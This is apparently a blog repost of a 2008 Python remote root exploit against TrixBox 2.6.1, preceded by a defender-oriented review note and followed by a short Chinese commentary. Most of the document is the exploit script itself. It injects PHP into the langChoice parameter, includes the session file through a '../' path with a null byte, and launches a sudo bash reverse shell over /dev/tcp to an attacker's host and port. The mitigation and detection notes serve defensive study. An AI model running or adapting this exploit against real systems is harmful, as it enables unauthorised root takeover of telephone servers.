TrixBox 2.6.1 langChoice remote root exploit
2008-07-18 22:44
# NOTE(review): defender-oriented summary of the listing that follows.
# The page extraction flattened the script onto two lines, so it is not
# runnable as shown; the text is kept verbatim for reference.
#
# What the requests in the listing show:
#   1. A POST to /user/index.php whose langChoice value carries a PHP snippet
#      instead of a language name. The script's own status message says this
#      ends up in the PHP session file.
#   2. The session id is read from the Set-Cookie header of the response.
#   3. A second POST sets langChoice to a "../" traversal path ending in
#      /tmp/sess_<session id> followed by "%00". This suggests the parameter
#      is used to build an include path without validation (local file
#      inclusion) -- inferred from the request, the server code is not shown.
#   4. Two final POSTs set langChoice back to "english".
# The Host header is hard-coded to 192.168.219.132, independent of the host
# argument. The payload calls bash through sudo; together with the uid=0
# banner in the header this suggests the web-server account could run sudo
# without a password -- confirm on the affected system.
#
# Mitigation: apply the vendor fix, accept only an allow-list of language
# names for langChoice, and remove sudo rights from the web-server account.
# Detection: POST bodies to /user/index.php in which langChoice contains
# "../", "%00" or "<?php", and session files under /tmp that contain "<?php".
# TrixBox 2.6.1 langChoice remote root exploit # muts from offensive-security.com # chris from offensive-security.com # All credits to Jean-Michel BESNARD # Same same, but different. # http://www.offensive-security.com/0day/trixbox.py.txt ################################################################################ # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 # (disk),10(wheel) # uname -a # Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 # i686 i386 GNU/Linux ################################################################################ import sys from socket import * import re import os from time import sleep print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!/r/n" "[*] TrixBox 2.6.1 langChoice remote root exploit /r/n" "[*] http://www.offensive-security.com/0day/trixbox.py.txt/r/n") if (len(sys.argv)!=5): print "[*] Usage: %s " % sys.argv[0] exit(0) host=sys.argv[1] port=int(sys.argv[2]) lhost=sys.argv[3] lport=int(sys.argv[4]) def create_post(injection): buffer=("POST /user/index.php HTTP/1.1 /r/n" "Host: 192.168.219.132 /r/n" "Content-Type: application/x-www-form-urlencoded /r/n" "Content-Length: "+str(len(injection))+"/r/n/r/n" +injection) return buffer def send_post(host,port,input): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(input) output=s.recv(1024) s.close() return output def find_sessionid(http_output): headers=re.split("/n",http_output) for header in headers: if re.search("Set-Cookie",header): cook=header.split(" ") sessionid=cook[1][10:42] print "[*] Session ID is %s" % sessionid return sessionid print "[*] Injecting reverse shell into session file" bash_inject="langChoice=<?php shell_exec(/"sudo /bin/bash 0/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260/");?>" reverse=create_post(bash_inject) raw_session=send_post(host,port,reverse) print "[*] Extracting Session ID" id=find_sessionid(raw_session) print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % 
(lhost,lport) sleep(3) print "[*] Skadush! /r/n[*] Ctrl+C to exit reverse shell." tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00') send_post(host,port,tmpsession) print "[*] Cleaning up" cleanup=create_post('langChoice=english') send_post(host,port,cleanup) send_post(host,port,cleanup) print "[*] Done!"
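Trixbox 是一个基于 IP-PBX 的 VoIP 语音电话系统,截止到6月13号发布的最新版本是 2.6.1,官方网站是:http://www.trixbox.org 。milw0rm 上有人公布了一个 remote root exploit,是用 Python 语言编写的。从代码看,问题出在 /user/index.php 的 langChoice 参数:它的值看起来未经校验就被用来拼接包含文件的路径(本地文件包含),所以防护上应对该参数做白名单校验,并确认 Web 服务账户没有免密码的 sudo 权限。由于最近12天我都在学 Python,所以看上去特别的亲切,收藏一下,方便以后自己写exp :)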